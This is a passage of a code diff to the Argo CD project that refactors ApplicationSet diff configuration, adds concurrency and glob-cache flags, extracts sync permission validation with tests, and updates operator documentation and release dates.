+// diffConfig must be built once per reconcile cycle via BuildIgnoreDiffConfig and may be nil
+// when there are no ignoreDifferences rules. obj.Spec must already be normalized by the caller
+// via NormalizeApplicationSpec before this function is called; the live object fetched from the
+// cluster is normalized internally.
+//
 // The MutateFn is called regardless of creating or updating an object.
 //
 // It returns the executed operation and an error.
-func CreateOrUpdate(ctx context.Context, logCtx *log.Entry, c client.Client, ignoreAppDifferences argov1alpha1.ApplicationSetIgnoreDifferences, ignoreNormalizerOpts normalizers.IgnoreNormalizerOpts, obj *argov1alpha1.Application, f controllerutil.MutateFn) (controllerutil.OperationResult, error) {
+func CreateOrUpdate(ctx context.Context, logCtx *log.Entry, c client.Client, diffConfig argodiff.DiffConfig, obj *argov1alpha1.Application, f controllerutil.MutateFn) (controllerutil.OperationResult, error) {
 	key := client.ObjectKeyFromObject(obj)
 	if err := c.Get(ctx, key, obj); err != nil {
 		if !errors.IsNotFound(err) {
@@ -59,43 +101,18 @@ func CreateOrUpdate(ctx context.Context, logCtx *log.Entry, c client.Client, ign
 		return controllerutil.OperationResultNone, err
 	}

+	// Normalize the live spec to avoid spurious diffs from unimportant differences (e.g. nil vs
+	// empty SyncPolicy). obj.Spec is already normalized by the caller; only the live side needs it.
+	normalizedLive.Spec = *argo.NormalizeApplicationSpec(&normalizedLive.Spec)
+
 	// Apply ignoreApplicationDifferences rules to remove ignored fields from both the live and the desired state. This
 	// prevents those differences from appearing in the diff and therefore in the patch.
-	err := applyIgnoreDifferences(ignoreAppDifferences, normalizedLive, obj, ignoreNormalizerOpts)
+	err := applyIgnoreDifferences(diffConfig, normalizedLive, obj)
 	if err != nil {
 		return controllerutil.OperationResultNone, fmt.Errorf("failed to apply ignore differences: %w", err)
 	}

-	// Normalize to avoid diffing on unimportant differences.
-	normalizedLive.Spec = *argo.NormalizeApplicationSpec(&normalizedLive.Spec)
-	obj.Spec = *argo.NormalizeApplicationSpec(&obj.Spec)
-
-	equality := conversion.EqualitiesOrDie(
-		func(a, b resource.Quantity) bool {
-			// Ignore formatting, only care that numeric value stayed the same.
-			// TODO: if we decide it's important, it should be safe to start comparing the format.
-			//
-			// Uninitialized quantities are equivalent to 0 quantities.
-			return a.Cmp(b) == 0
-		},
-		func(a, b metav1.MicroTime) bool {
-			return a.UTC().Equal(b.UTC())
-		},
-		func(a, b metav1.Time) bool {
-			return a.UTC().Equal(b.UTC())
-		},
-		func(a, b labels.Selector) bool {
-			return a.String() == b.String()
-		},
-		func(a, b fields.Selector) bool {
-			return a.String() == b.String()
-		},
-		func(a, b argov1alpha1.ApplicationDestination) bool {
-			return a.Namespace == b.Namespace && a.Name == b.Name && a.Server == b.Server
-		},
-	)
-
-	if equality.DeepEqual(normalizedLive, obj) {
+	if appEquality.DeepEqual(normalizedLive, obj) {
 		return controllerutil.OperationResultNone, nil
 	}

@@ -135,19 +152,13 @@ func mutate(f controllerutil.MutateFn, key client.ObjectKey, obj client.Object)
 }

 // applyIgnoreDifferences applies the ignore differences rules to the found application. It modifies the applications in place.
-func applyIgnoreDifferences(applicationSetIgnoreDifferences argov1alpha1.ApplicationSetIgnoreDifferences, found *argov1alpha1.Application, generatedApp *argov1alpha1.Application, ignoreNormalizerOpts normalizers.IgnoreNormalizerOpts) error {
-	if len(applicationSetIgnoreDifferences) == 0 {
+// diffConfig may be nil, in which case this is a no-op.
+func applyIgnoreDifferences(diffConfig argodiff.DiffConfig, found *argov1alpha1.Application, generatedApp *argov1alpha1.Application) error {
+	if diffConfig == nil {
 		return nil
 	}

 	generatedAppCopy := generatedApp.DeepCopy()
-	diffConfig, err := argodiff.NewDiffConfigBuilder().
-		WithDiffSettings(applicationSetIgnoreDifferences.ToApplicationIgnoreDifferences(), nil, false, ignoreNormalizerOpts).
-		WithNoCache().
-		Build()
-	if err != nil {
-		return fmt.Errorf("failed to build diff config: %w", err)
-	}
 	unstructuredFound, err := appToUnstructured(found)
 	if err != nil {
 		return fmt.Errorf("failed to convert found application to unstructured: %w", err)
--- a/applicationset/utils/createOrUpdate_test.go
+++ b/applicationset/utils/createOrUpdate_test.go
@@ -224,7 +224,9 @@ spec:
 			generatedApp := v1alpha1.Application{TypeMeta: appMeta}
 			err = yaml.Unmarshal([]byte(tc.generatedApp), &generatedApp)
 			require.NoError(t, err, tc.generatedApp)
-			err = applyIgnoreDifferences(tc.ignoreDifferences, &foundApp, &generatedApp, normalizers.IgnoreNormalizerOpts{})
+			diffConfig, err := BuildIgnoreDiffConfig(tc.ignoreDifferences, normalizers.IgnoreNormalizerOpts{})
+			require.NoError(t, err)
+			err = applyIgnoreDifferences(diffConfig, &foundApp, &generatedApp)
 			require.NoError(t, err)
 			yamlFound, err := yaml.Marshal(tc.foundApp)
 			require.NoError(t, err)
--- a/cmd/argocd-applicationset-controller/commands/applicationset_controller.go
+++ b/cmd/argocd-applicationset-controller/commands/applicationset_controller.go
@@ -79,6 +79,7 @@ func NewCommand() *cobra.Command {
 		tokenRefStrictMode           bool
 		maxResourcesStatusCount      int
 		cacheSyncPeriod              time.Duration
+		concurrentApplicationUpdates int
 	)
 	scheme := runtime.NewScheme()
 	_ = clientgoscheme.AddToScheme(scheme)
@@ -239,24 +240,25 @@ func NewCommand() *cobra.Command {
 				})

 			if err = (&controllers.ApplicationSetReconciler{
-				Generators:                 topLevelGenerators,
-				Client:                     utils.NewCacheSyncingClient(mgr.GetClient(), mgr.GetCache()),
-				Scheme:                     mgr.GetScheme(),
-				Recorder:                   mgr.GetEventRecorderFor("applicationset-controller"),
-				Renderer:                   &utils.Render{},
-				Policy:                     policyObj,
-				EnablePolicyOverride:       enablePolicyOverride,
-				KubeClientset:              k8sClient,
-				ArgoDB:                     argoCDDB,
-				ArgoCDNamespace:            namespace,
-				ApplicationSetNamespaces:   applicationSetNamespaces,
-				EnableProgressiveSyncs:     enableProgressiveSyncs,
-				SCMRootCAPath:              scmRootCAPath,
-				GlobalPreservedAnnotations: globalPreservedAnnotations,
-				GlobalPreservedLabels:      globalPreservedLabels,
-				Metrics:                    &metrics,
-				MaxResourcesStatusCount:    maxResourcesStatusCount,
-				ClusterInformer:            clusterInformer,
+				Generators:                   topLevelGenerators,
+				Client:                       utils.NewCacheSyncingClient(mgr.GetClient(), mgr.GetCache()),
+				Scheme:                       mgr.GetScheme(),
+				Recorder:                     mgr.GetEventRecorderFor("applicationset-controller"),
+				Renderer:                     &utils.Render{},
+				Policy:                       policyObj,
+				EnablePolicyOverride:         enablePolicyOverride,
+				KubeClientset:                k8sClient,
+				ArgoDB:                       argoCDDB,
+				ArgoCDNamespace:              namespace,
+				ApplicationSetNamespaces:     applicationSetNamespaces,
+				EnableProgressiveSyncs:       enableProgressiveSyncs,
+				SCMRootCAPath:                scmRootCAPath,
+				GlobalPreservedAnnotations:   globalPreservedAnnotations,
+				GlobalPreservedLabels:        globalPreservedLabels,
+				Metrics:                      &metrics,
+				MaxResourcesStatusCount:      maxResourcesStatusCount,
+				ClusterInformer:              clusterInformer,
+				ConcurrentApplicationUpdates: concurrentApplicationUpdates,
 			}).SetupWithManager(mgr, enableProgressiveSyncs, maxConcurrentReconciliations); err != nil {
 				log.Error(err, "unable to create controller", "controller", "ApplicationSet")
 				os.Exit(1)
@@ -303,6 +305,7 @@ func NewCommand() *cobra.Command {
 	command.Flags().BoolVar(&enableGitHubAPIMetrics, "enable-github-api-metrics", env.ParseBoolFromEnv("ARGOCD_APPLICATIONSET_CONTROLLER_ENABLE_GITHUB_API_METRICS", false), "Enable GitHub API metrics for generators that use the GitHub API")
 	command.Flags().IntVar(&maxResourcesStatusCount, "max-resources-status-count", env.ParseNumFromEnv("ARGOCD_APPLICATIONSET_CONTROLLER_MAX_RESOURCES_STATUS_COUNT", 5000, 0, math.MaxInt), "Max number of resources stored in appset status.")
 	command.Flags().DurationVar(&cacheSyncPeriod, "cache-sync-period", env.ParseDurationFromEnv("ARGOCD_APPLICATIONSET_CONTROLLER_CACHE_SYNC_PERIOD", time.Hour*10, 0, time.Hour*24), "Period at which the manager client cache is forcefully resynced with the Kubernetes API server. 0 disables periodic resync.")
+	command.Flags().IntVar(&concurrentApplicationUpdates, "concurrent-application-updates", env.ParseNumFromEnv("ARGOCD_APPLICATIONSET_CONTROLLER_CONCURRENT_APPLICATION_UPDATES", 1, 1, 200), "Number of concurrent Application create/update/delete operations per ApplicationSet reconcile.")

 	return &command
 }
--- a/cmd/argocd-applicationset-controller/commands/applicationset_controller_test.go
+++ b/cmd/argocd-applicationset-controller/commands/applicationset_controller_test.go
@@ -0,0 +1,28 @@
+package command
+
+import (
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+)
+
+func TestNewCommand_ConcurrentApplicationUpdatesFlag(t *testing.T) {
+	cmd := NewCommand()
+
+	flag := cmd.Flags().Lookup("concurrent-application-updates")
+	require.NotNil(t, flag, "expected --concurrent-application-updates flag to be registered")
+	assert.Equal(t, "int", flag.Value.Type())
+	assert.Equal(t, "1", flag.DefValue, "default should be 1")
+}
+
+func TestNewCommand_ConcurrentApplicationUpdatesFlagValue(t *testing.T) {
+	cmd := NewCommand()
+
+	err := cmd.Flags().Set("concurrent-application-updates", "5")
+	require.NoError(t, err)
+
+	val, err := cmd.Flags().GetInt("concurrent-application-updates")
+	require.NoError(t, err)
+	assert.Equal(t, 5, val)
+}
--- a/cmd/argocd-server/commands/argocd_server.go
+++ b/cmd/argocd-server/commands/argocd_server.go
@@ -34,6 +34,7 @@ import (
 	"github.com/argoproj/argo-cd/v3/util/dex"
 	"github.com/argoproj/argo-cd/v3/util/env"
 	"github.com/argoproj/argo-cd/v3/util/errors"
+	utilglob "github.com/argoproj/argo-cd/v3/util/glob"
 	"github.com/argoproj/argo-cd/v3/util/kube"
 	"github.com/argoproj/argo-cd/v3/util/templates"
 	"github.com/argoproj/argo-cd/v3/util/tls"
@@ -87,6 +88,7 @@ func NewCommand() *cobra.Command {
 		applicationNamespaces    []string
 		enableProxyExtension     bool
 		webhookParallelism       int
+		globCacheSize            int
 		hydratorEnabled          bool
 		syncWithReplaceAllowed   bool

@@ -122,6 +124,7 @@ func NewCommand() *cobra.Command {
 			cli.SetLogFormat(cmdutil.LogFormat)
 			cli.SetLogLevel(cmdutil.LogLevel)
 			cli.SetGLogLevel(glogLevel)
+			utilglob.SetCacheSize(globCacheSize)

 			// Recover from panic and log the error using the configured logger instead of the default.
 			defer func() {
@@ -326,6 +329,7 @@ func NewCommand() *cobra.Command {
 	command.Flags().StringSliceVar(&applicationNamespaces, "application-namespaces", env.StringsFromEnv("ARGOCD_APPLICATION_NAMESPACES", []string{}, ","), "List of additional namespaces where application resources can be managed in")
 	command.Flags().BoolVar(&enableProxyExtension, "enable-proxy-extension", env.ParseBoolFromEnv("ARGOCD_SERVER_ENABLE_PROXY_EXTENSION", false), "Enable Proxy Extension feature")
 	command.Flags().IntVar(&webhookParallelism, "webhook-parallelism-limit", env.ParseNumFromEnv("ARGOCD_SERVER_WEBHOOK_PARALLELISM_LIMIT", 50, 1, 1000), "Number of webhook requests processed concurrently")
+	command.Flags().IntVar(&globCacheSize, "glob-cache-size", env.ParseNumFromEnv("ARGOCD_SERVER_GLOB_CACHE_SIZE", utilglob.DefaultGlobCacheSize, 1, math.MaxInt32), "Maximum number of compiled glob patterns to cache for RBAC evaluation")
 	command.Flags().StringSliceVar(&enableK8sEvent, "enable-k8s-event", env.StringsFromEnv("ARGOCD_ENABLE_K8S_EVENT", argo.DefaultEnableEventList(), ","), "Enable ArgoCD to use k8s event. For disabling all events, set the value as `none`. (e.g --enable-k8s-event=none), For enabling specific events, set the value as `event reason`. (e.g --enable-k8s-event=StatusRefreshed,ResourceCreated)")
 	command.Flags().BoolVar(&hydratorEnabled, "hydrator-enabled", env.ParseBoolFromEnv("ARGOCD_HYDRATOR_ENABLED", false), "Feature flag to enable Hydrator. Default (\"false\")")
 	command.Flags().BoolVar(&syncWithReplaceAllowed, "sync-with-replace-allowed", env.ParseBoolFromEnv("ARGOCD_SYNC_WITH_REPLACE_ALLOWED", true), "Whether to allow users to select replace for syncs from UI/CLI")
--- a/cmd/argocd/commands/app.go
+++ b/cmd/argocd/commands/app.go
@@ -2334,7 +2334,7 @@ func NewApplicationSyncCommand(clientOpts *argocdclient.ClientOptions) *cobra.Co

 				if app.Spec.HasMultipleSources() {
 					if revision != "" {
-						log.Fatal("argocd cli does not work on multi-source app with --revision flag. Use --revisions and --source-position instead.")
+						log.Fatal("argocd cli does not work on multi-source app with --revision flag. Use --revisions and --source-positions instead.")
 						return
 					}

--- a/controller/sync.go
+++ b/controller/sync.go
@@ -308,22 +308,9 @@ func (m *appStateManager) SyncAppState(app *v1alpha1.Application, project *v1alp
 		sync.WithLogr(logutils.NewLogrusLogger(logEntry)),
 		sync.WithHealthOverride(lua.ResourceHealthOverrides(resourceOverrides)),
 		sync.WithPermissionValidator(func(un *unstructured.Unstructured, res *metav1.APIResource) error {
-			if !project.IsGroupKindNamePermitted(un.GroupVersionKind().GroupKind(), un.GetName(), res.Namespaced) {
-				return fmt.Errorf("resource %s:%s is not permitted in project %s", un.GroupVersionKind().Group, un.GroupVersionKind().Kind, project.Name)
-			}
-			if res.Namespaced {
-				permitted, err := project.IsDestinationPermitted(destCluster, un.GetNamespace(), func(project string) ([]*v1alpha1.Cluster, error) {
-					return m.db.GetProjectClusters(context.TODO(), project)
-				})
-				if err != nil {
-					return err
-				}
-
-				if !permitted {
-					return fmt.Errorf("namespace %v is not permitted in project '%s'", un.GetNamespace(), project.Name)
-				}
-			}
-			return nil
+			return validateSyncPermissions(project, destCluster, func(proj string) ([]*v1alpha1.Cluster, error) {
+				return m.db.GetProjectClusters(context.TODO(), proj)
+			}, un, res)
 		}),
 		sync.WithOperationSettings(syncOp.DryRun, syncOp.Prune, syncOp.SyncStrategy.Force(), syncOp.IsApplyStrategy() || len(syncOp.Resources) > 0),
 		sync.WithInitialState(state.Phase, state.Message, initialResourcesRes, state.StartedAt),
@@ -605,3 +592,33 @@ func deriveServiceAccountToImpersonate(project *v1alpha1.AppProject, application
 	// if there is no match found in the AppProject.Spec.DestinationServiceAccounts, use the default service account of the destination namespace.
 	return "", fmt.Errorf("no matching service account found for destination server %s and namespace %s", application.Spec.Destination.Server, serviceAccountNamespace)
 }
+
+// validateSyncPermissions checks whether the given resource is permitted by the project's
+// allow/deny lists and destination rules. It returns an error if the API resource info is nil
+// (preventing a nil-pointer panic), if the resource's group/kind is not permitted, or if
+// the resource's namespace is not an allowed destination.
+func validateSyncPermissions(
+	project *v1alpha1.AppProject,
+	destCluster *v1alpha1.Cluster,
+	getProjectClusters func(string) ([]*v1alpha1.Cluster, error),
+	un *unstructured.Unstructured,
+	res *metav1.APIResource,
+) error {
+	if res == nil {
+		return fmt.Errorf("failed to get API resource info for %s/%s: unable to verify permissions", un.GroupVersionKind().Group, un.GroupVersionKind().Kind)
+	}
+	if !project.IsGroupKindNamePermitted(un.GroupVersionKind().GroupKind(), un.GetName(), res.Namespaced) {
+		return fmt.Errorf("resource %s:%s is not permitted in project %s", un.GroupVersionKind().Group, un.GroupVersionKind().Kind, project.Name)
+	}
+	if res.Namespaced {
+		permitted, err := project.IsDestinationPermitted(destCluster, un.GetNamespace(), getProjectClusters)
+		if err != nil {
+			return err
+		}
+
+		if !permitted {
+			return fmt.Errorf("namespace %v is not permitted in project '%s'", un.GetNamespace(), project.Name)
+		}
+	}
+	return nil
+}
--- a/controller/sync_test.go
+++ b/controller/sync_test.go
@@ -13,6 +13,7 @@ import (
 	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
 	"k8s.io/apimachinery/pkg/apis/meta/v1/unstructured"
 	"k8s.io/apimachinery/pkg/runtime"
+	"k8s.io/apimachinery/pkg/runtime/schema"

 	"github.com/argoproj/argo-cd/v3/common"
 	"github.com/argoproj/argo-cd/v3/controller/testdata"
@@ -1653,3 +1654,116 @@ func dig(obj any, path ...any) any {

 	return i
 }
+
+func TestValidateSyncPermissions(t *testing.T) {
+	t.Parallel()
+
+	newResource := func(group, kind, name, namespace string) *unstructured.Unstructured {
+		obj := &unstructured.Unstructured{}
+		obj.SetGroupVersionKind(schema.GroupVersionKind{Group: group, Version: "v1", Kind: kind})
+		obj.SetName(name)
+		obj.SetNamespace(namespace)
+		return obj
+	}
+
+	project := &v1alpha1.AppProject{
+		ObjectMeta: metav1.ObjectMeta{
+			Name:      "test-project",
+			Namespace: "argocd",
+		},
+		Spec: v1alpha1.AppProjectSpec{
+			Destinations: []v1alpha1.ApplicationDestination{
+				{Namespace: "default", Server: "*"},
+			},
+		},
+	}
+
+	destCluster := &v1alpha1.Cluster{
+		Server: "https://kubernetes.default.svc",
+	}
+
+	noopGetClusters := func(_ string) ([]*v1alpha1.Cluster, error) {
+		return nil, nil
+	}
+
+	t.Run("nil APIResource returns error", func(t *testing.T) {
+		t.Parallel()
+		un := newResource("apps", "Deployment", "my-deploy", "default")
+
+		err := validateSyncPermissions(project, destCluster, noopGetClusters, un, nil)
+
+		require.Error(t, err)
+		assert.Contains(t, err.Error(), "failed to get API resource info for apps/Deployment")
+		assert.Contains(t, err.Error(), "unable to verify permissions")
+	})
+
+	t.Run("permitted namespaced resource returns no error", func(t *testing.T) {
+		t.Parallel()
+		un := newResource("", "ConfigMap", "my-cm", "default")
+		res := &metav1.APIResource{Name: "configmaps", Namespaced: true}
+
+		err := validateSyncPermissions(project, destCluster, noopGetClusters, un, res)
+
+		assert.NoError(t, err)
+	})
+
+	t.Run("group kind not permitted returns error", func(t *testing.T) {
+		t.Parallel()
+		projectWithDenyList := &v1alpha1.AppProject{
+			ObjectMeta: metav1.ObjectMeta{
+				Name:      "restricted-project",
+				Namespace: "argocd",
+			},
+			Spec: v1alpha1.AppProjectSpec{
+				Destinations: []v1alpha1.ApplicationDestination{
+					{Namespace: "*", Server: "*"},
+				},
+				ClusterResourceBlacklist: []v1alpha1.ClusterResourceRestrictionItem{
+					{Group: "rbac.authorization.k8s.io", Kind: "ClusterRole"},
+				},
+			},
+		}
+		un := newResource("rbac.authorization.k8s.io", "ClusterRole", "my-role", "")
+		res := &metav1.APIResource{Name: "clusterroles", Namespaced: false}
+
+		err := validateSyncPermissions(projectWithDenyList, destCluster, noopGetClusters, un, res)
+
+		require.Error(t, err)
+		assert.Contains(t, err.Error(), "is not permitted in project")
+	})
+
+	t.Run("namespace not permitted returns error", func(t *testing.T) {
+		t.Parallel()
+		un := newResource("", "ConfigMap", "my-cm", "kube-system")
+		res := &metav1.APIResource{Name: "configmaps", Namespaced: true}
+
+		err := validateSyncPermissions(project, destCluster, noopGetClusters, un, res)
+
+		require.Error(t, err)
+		assert.Contains(t, err.Error(), "namespace kube-system is not permitted in project")
+	})
+
+	t.Run("cluster-scoped resource skips namespace check", func(t *testing.T) {
+		t.Parallel()
+		projectWithClusterResources := &v1alpha1.AppProject{
+			ObjectMeta: metav1.ObjectMeta{
+				Name:      "test-project",
+				Namespace: "argocd",
+			},
+			Spec: v1alpha1.AppProjectSpec{
+				Destinations: []v1alpha1.ApplicationDestination{
+					{Namespace: "default", Server: "*"},
+				},
+				ClusterResourceWhitelist: []v1alpha1.ClusterResourceRestrictionItem{
+					{Group: "*", Kind: "*"},
+				},
+			},
+		}
+		un := newResource("", "Namespace", "my-ns", "")
+		res := &metav1.APIResource{Name: "namespaces", Namespaced: false}
+
+		err := validateSyncPermissions(projectWithClusterResources, destCluster, noopGetClusters, un, res)
+
+		assert.NoError(t, err)
+	})
+}
--- a/docs/developer-guide/release-process-and-cadence.md
+++ b/docs/developer-guide/release-process-and-cadence.md
@@ -21,8 +21,8 @@ These are the upcoming releases dates:
 | v3.1    | Monday, Jun. 16, 2025 | Monday, Aug. 4, 2025 | [Christian Hernandez](https://github.com/christianh814)  | [Alexandre Gaudreault](https://github.com/agaudreault) | [checklist](https://github.com/argoproj/argo-cd/issues/23347) |
 | v3.2    | Monday, Sep. 15, 2025 | Monday, Nov. 3, 2025 | [Nitish Kumar](https://github.com/nitishfy)              |  [Michael Crenshaw](https://github.com/crenshaw-dev) | [checklist](https://github.com/argoproj/argo-cd/issues/24539) |
 | v3.3    | Monday, Dec. 15, 2025 | Monday, Feb. 2, 2026 | [Peter Jiang](https://github.com/pjiang-dev)             | [Regina Voloshin](https://github.com/reggie-k)         | [checklist](https://github.com/argoproj/argo-cd/issues/25211) |
-| v3.4    | Monday, Mar. 16, 2026 | Monday, May. 4, 2026 | [Codey Jenkins](https://github.com/FourFifthsCode)       | [Regina Voloshin](https://github.com/reggie-k) | [checklist](https://github.com/argoproj/argo-cd/issues/26527) |
-| v3.5    | Monday, Jun. 15, 2026 | Monday, Aug. 3, 2026 | [Patroklos Papapetrou](https://github.com/ppapapetrou76) | [Regina Voloshin](https://github.com/reggie-k) | [checklist](https://github.com/argoproj/argo-cd/issues/26746) |
+| v3.4    | Monday, Mar. 16, 2026 | Tuesday, May. 5, 2026 | [Codey Jenkins](https://github.com/FourFifthsCode)       | [Regina Voloshin](https://github.com/reggie-k) | [checklist](https://github.com/argoproj/argo-cd/issues/26527) |
+| v3.5    | Tuesday, Jun. 16, 2026 | Tuesday, Aug. 4, 2026 | [Patroklos Papapetrou](https://github.com/ppapapetrou76) | [Regina Voloshin](https://github.com/reggie-k) | [checklist](https://github.com/argoproj/argo-cd/issues/26746) |

 Actual release dates might differ from the plan by a few days.

@@ -36,10 +36,10 @@ effectively means that there is a seven-week feature freeze.

 These are the approximate release dates:

-* The first Monday of February
-* The first Monday of May
-* The first Monday of August
-* The first Monday of November
+* The first Tuesday of February
+* The first Tuesday of May
+* The first Tuesday of August
+* The first Tuesday of November

 Dates may be shifted slightly to accommodate holidays. Those shifts should be minimal.

--- a/docs/faq.md
+++ b/docs/faq.md
@@ -83,6 +83,26 @@ or a randomly generated password stored in a secret (Argo CD 1.9 and later).
 Add `admin.enabled: "false"` to the `argocd-cm` ConfigMap
 (see [user management](./operator-manual/user-management/index.md)).

+## How to view orphaned resources?
+
+Orphaned Kubernetes resources are top-level namespaced resources that do not belong to any Argo CD Application. For more information, see [Orphaned Resources Monitoring](./user-guide/orphaned-resources.md).
+
+!!! warning
+    Enabling orphaned resource monitoring has performance implications. If an AppProject monitors a namespace containing many resources not managed by Argo CD (e.g. `kube-system`), it can significantly impact your Argo CD instance. Enable this feature only on projects with well-scoped namespaces.
+
+To view orphaned resources in the Argo CD UI:
+
+1. Click on **Settings** in the sidebar.
+2. Click on **Projects**.
+3. Select the desired project.
+4. Scroll down to the **RESOURCE MONITORING** section.
+5. Click **Edit** and enable the monitoring feature.
+6. Check **Enable application warning conditions?** to enable warnings.
+7. Click **Save**.
+8. Navigate back to **Applications** and select an application under the configured project.
+9. In the **Sync Panel**, under **APP CONDITIONS**, you will see the orphaned resources warning.
+10. Click **Show Orphaned** below the **HEALTH STATUS** filters to display orphaned resources.
+
 ## Argo CD cannot deploy Helm Chart based applications without internet access, how can I solve it?

 Argo CD might fail to generate Helm chart manifests if the chart has dependencies located in external repositories. To
--- a/docs/operator-manual/applicationset/Appset-Any-Namespace.md
+++ b/docs/operator-manual/applicationset/Appset-Any-Namespace.md
@@ -230,7 +230,7 @@ p, somerole, applicationsets, get, foo/bar/*, allow

 ### Using the CLI

-You can use all existing Argo CD CLI commands for managing applications in other namespaces, exactly as you would use the CLI to manage applications in the control plane's namespace.
+You can use all existing Argo CD CLI commands for managing ApplicationSets in other namespaces, exactly as you would use the CLI to manage ApplicationSets in the control plane's namespace.

 For example, to retrieve the `ApplicationSet` named `foo` in the namespace `bar`, you can use the following CLI command:

--- a/docs/operator-manual/argocd-cmd-params-cm.yaml
+++ b/docs/operator-manual/argocd-cmd-params-cm.yaml
@@ -150,6 +150,8 @@ data:
  server.api.content.types: "application/json"
  # Number of webhook requests processed concurrently (default 50)
  server.webhook.parallelism.limit: "50"
+  # Maximum number of compiled glob patterns to cache for RBAC evaluation (default 10000)
+  server.glob.cache.size: "10000"
  # Whether to allow sync with replace checked to go through. Resource-level annotation to replace override this setting, i.e. it's only enforced on the API server level.
  server.sync.replace.allowed: "true"

--- a/docs/operator-manual/high_availability.md
+++ b/docs/operator-manual/high_availability.md
@@ -253,6 +253,11 @@ spec:
  megabytes.
  The default value is 200. You might need to increase this for an Argo CD instance that manages 3000+ applications.

+* The `server.glob.cache.size` config key in `argocd-cmd-params-cm` (or the `--glob-cache-size` server flag) controls
+  the maximum number of compiled glob patterns cached for RBAC policy evaluation. Glob pattern compilation is expensive,
+  and caching significantly improves RBAC performance when many applications are managed. The default value is 10000.
+  See [RBAC Glob Matching](rbac.md#glob-matching) for more details.
+
 ### argocd-dex-server, argocd-redis

 The `argocd-dex-server` uses an in-memory database, and two or more instances may have inconsistent data.
--- a/docs/operator-manual/metrics.md
+++ b/docs/operator-manual/metrics.md
@@ -199,7 +199,7 @@ The example below will expose the Argo CD Application labels `team-name` and `en
 In this case, the metric would look like:

 ```
-# TYPE argocd_app_labels gauge
+# TYPE argocd_cluster_labels gauge
 argocd_cluster_labels{label_environment="dev",label_team_name="team1",name="cluster1",server="server1"} 1
 argocd_cluster_labels{label_environment="staging",label_team_name="team2",name="cluster2",server="server2"} 1
 argocd_cluster_labels{label_environment="production",label_team_name="team3",name="cluster3",server="server3"} 1
--- a/docs/operator-manual/rbac.md
+++ b/docs/operator-manual/rbac.md
@@ -321,6 +321,10 @@ When the `example-user` executes the `extensions/DaemonSet/test` action, the fol
 3. The value `action/extensions/DaemonSet/test` matches `action/extensions/*`. Note that `/` is not treated as a separator and the use of `**` is not necessary.
 4. The value `default/my-app` matches `default/*`.

+> [!TIP]
+> For performance tuning of glob pattern matching, see the `server.glob.cache.size` config key in
+> [High Availability - argocd-server](high_availability.md#argocd-server).
+
 ## Using SSO Users/Groups

 The `scopes` field controls which OIDC scopes to examine during RBAC enforcement (in addition to `sub` scope).
--- a/docs/operator-manual/server-commands/argocd-applicationset-controller.md
+++ b/docs/operator-manual/server-commands/argocd-applicationset-controller.md
@@ -22,6 +22,7 @@ argocd-applicationset-controller [flags]
      --client-certificate string               Path to a client certificate file for TLS
      --client-key string                       Path to a client key file for TLS
      --cluster string                          The name of the kubeconfig cluster to use
+      --concurrent-application-updates int      Number of concurrent Application create/update/delete operations per ApplicationSet reconcile. (default 1)
      --concurrent-reconciliations int          Max concurrent reconciliations limit for the controller (default 10)
      --context string                          The name of the kubeconfig context to use
      --debug                                   Print debug logs. Takes precedence over loglevel
--- a/docs/operator-manual/server-commands/argocd-server.md
+++ b/docs/operator-manual/server-commands/argocd-server.md
@@ -54,6 +54,7 @@ argocd-server [flags]
      --enable-gzip                                     Enable GZIP compression (default true)
      --enable-k8s-event none                           Enable ArgoCD to use k8s event. For disabling all events, set the value as none. (e.g --enable-k8s-event=none), For enabling specific events, set the value as `event reason`. (e.g --enable-k8s-event=StatusRefreshed,ResourceCreated) (default [all])
      --enable-proxy-extension                          Enable Proxy Extension feature
+      --glob-cache-size int                             Maximum number of compiled glob patterns to cache for RBAC evaluation (default 10000)
      --gloglevel int                                   Set the glog logging level
  -h, --help                                            help for argocd-server
      --hydrator-enabled                                Feature flag to enable Hydrator. Default ("false")
--- a/docs/operator-manual/tested-kubernetes-versions.md
+++ b/docs/operator-manual/tested-kubernetes-versions.md
@@ -1,5 +1,2 @@
-| Argo CD version | Kubernetes versions |
-|-----------------|---------------------|
-| 3.4 | v1.35, v1.34, v1.33, v1.32 |
-| 3.3 | v1.34, v1.33, v1.32, v1.31 |
-| 3.2 | v1.34, v1.33, v1.32, v1.31 |
+This page is populated for released Argo CD versions. Use the version selector to view this table for a specific 
+version. 
--- a/docs/snyk/index.md
+++ b/docs/snyk/index.md
@@ -14,35 +14,49 @@ recent minor releases.
 |    | Critical | High | Medium | Low |
 |---:|:--------:|:----:|:------:|:---:|
 | [gitops-engine/go.mod](master/argocd-test.html) | 0 | 0 | 2 | 0 |
-| [go.mod](master/argocd-test.html) | 0 | 0 | 6 | 0 |
-| [ui/yarn.lock](master/argocd-test.html) | 0 | 4 | 5 | 2 |
-| [dex:v2.45.0](master/ghcr.io_dexidp_dex_v2.45.0.html) | 1 | 0 | 1 | 0 |
+| [go.mod](master/argocd-test.html) | 0 | 0 | 9 | 0 |
+| [ui/yarn.lock](master/argocd-test.html) | 0 | 6 | 5 | 2 |
+| [dex:v2.45.0](master/ghcr.io_dexidp_dex_v2.45.0.html) | 0 | 1 | 1 | 0 |
 | [haproxy:3.0.8-alpine](master/public.ecr.aws_docker_library_haproxy_3.0.8-alpine.html) | 0 | 1 | 0 | 14 |
 | [redis:8.2.3-alpine](master/public.ecr.aws_docker_library_redis_8.2.3-alpine.html) | 0 | 0 | 0 | 0 |
-| [argocd:latest](master/quay.io_argoproj_argocd_latest.html) | 0 | 0 | 9 | 10 |
+| [argocd:latest](master/quay.io_argoproj_argocd_latest.html) | 0 | 0 | 6 | 4 |
 | [install.yaml](master/argocd-iac-install.html) | - | - | - | - |
 | [namespace-install.yaml](master/argocd-iac-namespace-install.html) | - | - | - | - |

-### v3.3.2
+### v3.4.0-rc2

 |    | Critical | High | Medium | Low |
 |---:|:--------:|:----:|:------:|:---:|
-| [gitops-engine/go.mod](v3.3.2/argocd-test.html) | 0 | 0 | 2 | 0 |
-| [go.mod](v3.3.2/argocd-test.html) | 0 | 1 | 6 | 0 |
-| [ui/yarn.lock](v3.3.2/argocd-test.html) | 0 | 6 | 7 | 2 |
-| [dex:v2.43.0](v3.3.2/ghcr.io_dexidp_dex_v2.43.0.html) | 0 | 1 | 0 | 14 |
-| [haproxy:3.0.8-alpine](v3.3.2/public.ecr.aws_docker_library_haproxy_3.0.8-alpine.html) | 0 | 1 | 0 | 14 |
